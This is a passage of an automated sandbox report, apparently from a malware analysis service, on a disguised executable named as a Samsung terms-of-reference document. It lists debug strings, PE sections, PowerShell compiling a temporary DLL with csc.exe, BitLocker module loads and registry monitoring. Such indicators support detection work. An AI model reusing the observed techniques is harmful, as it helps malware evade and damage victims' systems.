Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Registry\Release\net8.0-windows\Microsoft.Win32.Registry.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167936851.000002980C4B0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159001590.0000025772101000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.pdbhP source: powershell.exe, 00000004.00000002.2110018131.000001F7016FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NameResolution\Release\net8.0-windows\System.Net.NameResolution.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165182661.000002980BAA1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164742088.000002980BA10000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163503853.000002980B710000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163706047.000002980B741000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166713900.000002980BD91000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166604611.000002980BD60000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.NonGeneric.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160394554.00000298086E1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168774305.000002980CA20000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159537261.00000257739B1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159402983.0000025773960000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Linq.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166713900.000002980BD91000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166604611.000002980BD60000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164582542.000002980B9F1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164662084.000002980BA00000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net8.0\System.Diagnostics.Tracing.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160570585.00000298087E0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160552630.00000298087D1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Memory.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168744151.000002980CA01000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161453512.0000029808CA8000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167910590.000002980C4A0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160623783.0000029808800000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3158687208.0000025771EE1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\Release\net8.0\System.Reflection.Primitives.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167883026.000002980C490000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167851335.000002980C481000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Private.DataContractSerialization.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165358680.000002980BAC0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165286031.000002980BAB1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163793512.000002980B770000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163937013.000002980B7C1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Collections.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165666377.000002980BB01000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165504033.000002980BAE0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdbSHA256 source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163102585.000002980B590000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163286392.000002980B641000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Private.CoreLib.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdbSHA256 source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167964729.000002980C4D0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168032463.000002980C521000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Loader\Release\net8.0\System.Runtime.Loader.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165863155.000002980BB21000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166308984.000002980BD10000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Uri\Release\net8.0\System.Private.Uri.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163977952.000002980B810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163418543.000002980B6F1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Primitives\Release\net8.0-windows\System.Net.Primitives.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160491827.0000029808791000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160514082.00000298087B0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Security.Cryptography.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164385610.000002980B931000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164165214.000002980B870000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Private.Xml.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167376562.000002980C121000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166893087.000002980BE20000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.pdb source: powershell.exe, 00000004.00000002.2110018131.000001F7016FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Specialized.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168246148.000002980C5C0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168187257.000002980C5A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.ReaderWriter\Release\net8.0\System.Xml.ReaderWriter.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165424131.000002980BAD0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160601511.00000298087F1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.ILGeneration\Release\net8.0\System.Reflection.Emit.ILGeneration.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166578673.000002980BD50000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166519143.000002980BD41000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Runtime.Serialization.Primitives.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166397720.000002980BD21000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166461733.000002980BD30000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Runtime.InteropServices.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160232189.0000029808681000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160252767.0000029808690000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdbSHA256R source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166713900.000002980BD91000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166604611.000002980BD60000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net8.0\System.Threading.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160343247.00000298086C1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160361987.00000298086D0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Private.DataContractSerialization/Release/net8.0/System.Private.DataContractSerialization.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdbSHA256 source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168130282.000002980C590000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168102003.000002980C581000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Security.Claims.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Text.RegularExpressions.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167776836.000002980C420000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166830112.000002980BDC1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3188177414.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000000.2057822710.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163102585.000002980B590000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163286392.000002980B641000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdbSHA256 source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166397720.000002980BD21000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166461733.000002980BD30000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.ILGeneration\Release\net8.0\System.Reflection.Emit.ILGeneration.pdbSHA256 source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166578673.000002980BD50000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166519143.000002980BD41000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net8.0\System.Memory.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168744151.000002980CA01000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161453512.0000029808CA8000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167910590.000002980C4A0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.Primitives\Release\net8.0\System.ComponentModel.Primitives.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159462177.0000025773990000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159341485.0000025773951000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net8.0\System.Net.ServicePoint.pdbSHA256 source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168389200.000002980C5F0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168325428.000002980C5E1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Net.NameResolution.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165182661.000002980BAA1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164742088.000002980BA10000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Console.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160412636.0000029808700000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160451868.0000029808721000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Sockets\Release\net8.0-windows\System.Net.Sockets.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165031754.000002980BA61000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164868495.000002980BA20000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Claims\Release\net8.0\System.Security.Claims.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Diagnostics.DiagnosticSource.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163503853.000002980B710000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163706047.000002980B741000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Net.Http.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163102585.000002980B590000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163286392.000002980B641000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Threading.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160343247.00000298086C1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160361987.00000298086D0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159219363.0000025773920000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159195195.0000025773911000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net8.0\System.Runtime.InteropServices.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160232189.0000029808681000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160252767.0000029808690000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.ServicePoint.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168389200.000002980C5F0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168325428.000002980C5E1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Specialized\Release\net8.0\System.Collections.Specialized.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168246148.000002980C5C0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168187257.000002980C5A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net8.0\System.Net.ServicePoint.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168389200.000002980C5F0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168325428.000002980C5E1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.RegularExpressions\Release\net8.0\System.Text.RegularExpressions.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167776836.000002980C420000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166830112.000002980BDC1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdbSHA2560 source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165358680.000002980BAC0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165286031.000002980BAB1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Principal.Windows\Release\net8.0-windows\System.Security.Principal.Windows.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159637398.0000025773A11000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159598217.00000257739F0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.Primitives.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160491827.0000029808791000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160514082.00000298087B0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167964729.000002980C4D0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168032463.000002980C521000.00000020.00001000.00020000.00000000.sdmp
Source: Terms_of_reference_06_01_2025_samsung.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Terms_of_reference_06_01_2025_samsung.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Terms_of_reference_06_01_2025_samsung.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Terms_of_reference_06_01_2025_samsung.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Terms_of_reference_06_01_2025_samsung.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.cmdline"Jump to behavior
Source: Terms_of_reference_06_01_2025_samsung.scr.exeStatic PE information: section name: .CLR_UEF
Source: Terms_of_reference_06_01_2025_samsung.scr.exeStatic PE information: section name: .didat
Source: Terms_of_reference_06_01_2025_samsung.scr.exeStatic PE information: section name: Section
Source: Terms_of_reference_06_01_2025_samsung.scr.exeStatic PE information: section name: _RDATA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848E0D2A5 pushad ; iretd 2_2_00007FF848E0D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848FF2316 push 8B485F93h; iretd 2_2_00007FF848FF231B
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.dllJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
